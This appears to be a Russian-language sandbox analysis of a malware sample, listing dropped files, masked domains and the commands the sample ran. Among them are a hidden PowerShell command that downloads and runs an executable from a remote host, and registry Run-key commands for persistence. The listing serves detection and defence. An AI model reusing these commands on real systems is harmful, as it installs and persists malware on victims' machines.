Техническая информация
- http://sm###scope.info/fed/yb.exe как %appdata%\task.exe
- installutil.exe
- %TEMP%\abctfhghgdghghž.sct
- %APPDATA%\task.exe
- %TEMP%\d5826601-c1fb-4502-b6a6-7bd4388c1d4b\xxl.dll
- %TEMP%\installutil.exe
- %TEMP%\b35bc50e-fc56-4239-a7d0-bb79118b31c9\agiledotnetrt.dll
- %TEMP%\installutil.exe в %TEMP%\tmpg620.tmp
- http://sm###scope.info/fed/yb.exe
- DNS ASK sm###scope.info
- DNS ASK ex#####ntscope.co.vu
- '%APPDATA%\task.exe'
- '%TEMP%\installutil.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://sm###scope.info/fed/yb.exe','%APPDATA%\task.exe');Start-Process '%APPD...' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' /c REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /f /v /t REG_SZ /d <SYSTEM32>\pcalua.exe" -a %APPDATA%\task.exe"
- '%WINDIR%\syswow64\reg.exe' ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /f /v /t REG_SZ /d <SYSTEM32>\pcalua.exe" -a %APPDATA%\task.exe"